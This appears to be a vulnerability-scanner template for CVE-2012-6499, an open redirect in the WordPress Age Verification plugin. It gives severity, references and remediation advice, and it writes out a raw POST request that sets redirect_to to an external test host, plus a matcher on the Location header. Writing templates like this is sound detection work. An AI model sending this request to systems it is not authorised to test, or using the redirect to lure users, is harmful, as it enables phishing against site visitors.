id: CVE-2012-6499 info: name: WordPress Plugin Age Verification v0.4 - Open Redirect author: ctflearner severity: medium description: | Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter. remediation: | Update to the latest version of the WordPress Plugin Age Verification or remove the plugin if not needed. reference: - https://www.exploit-db.com/exploits/18350 - https://wordpress.org/plugins/age-verification - https://nvd.nist.gov/vuln/detail/CVE-2012-6499 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-6499 cwe-id: CWE-20 epss-score: 0.01204 epss-percentile: 0.83699 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: age_verification_project product: age_verification tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification http: - raw: - | POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1 Host: {{Hostname}} redirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970 matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # digest: 490a0046304402202545b740f5b12cdb25eb34ca93fb15a74cf233b2f704d5ea821e687e089e020402206da42316a9cf1f983c632f0e2f7825aff23adca32b620860b97971599ec62825:922c64590222798bb761d5b6d8e72950